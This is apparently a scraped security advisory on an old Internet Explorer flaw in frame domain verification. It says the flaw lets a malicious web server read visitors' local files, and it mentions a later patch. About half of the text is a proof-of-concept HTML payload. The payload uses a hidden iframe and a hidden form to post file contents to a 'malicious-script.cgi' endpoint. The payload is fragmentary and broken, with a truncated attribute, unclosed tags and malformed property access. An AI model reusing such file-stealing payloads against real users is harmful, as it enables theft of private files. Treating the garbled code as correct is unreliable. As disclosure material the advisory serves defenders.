[原文]Internet Explorer 4.x and 5.x does not properly verify the domain of a frame within a browser window, which allows a remote attacker to read client files via the frame, aka the "Frame Domain Verification" vulnerability.
The DocumentComplete() function in IE does not properly validate origin domains.
Therefore it is possible for a remote webserver to gain read access to local files on the machine of any website visitor or email recipient by accessing the browser object of a frame containing local content. Only files that can be opened by a browser window (eg. *.htm, *.js, *.txt etc) are viewable, and the path and name of the file must be known by the attacker.
Update (May 16, 2001): A new variant of this vulnerability has been discovered. Microsoft has released a new patch to address all known variants of this vulnerability.
<iframe id=clientContent width=0 height=0 noborder>
<script for=clientContent event="DocumentComplete(browser)">
// browser is an instance of the IWebBrowser COM object
document.forms.elements.value = browser.document.body.innerText;
<form action="/cgi/malicious-script.cgi" method=post onSubmit="window.alert(document.forms.elements.value); return
<input name="file_text" type=hidden>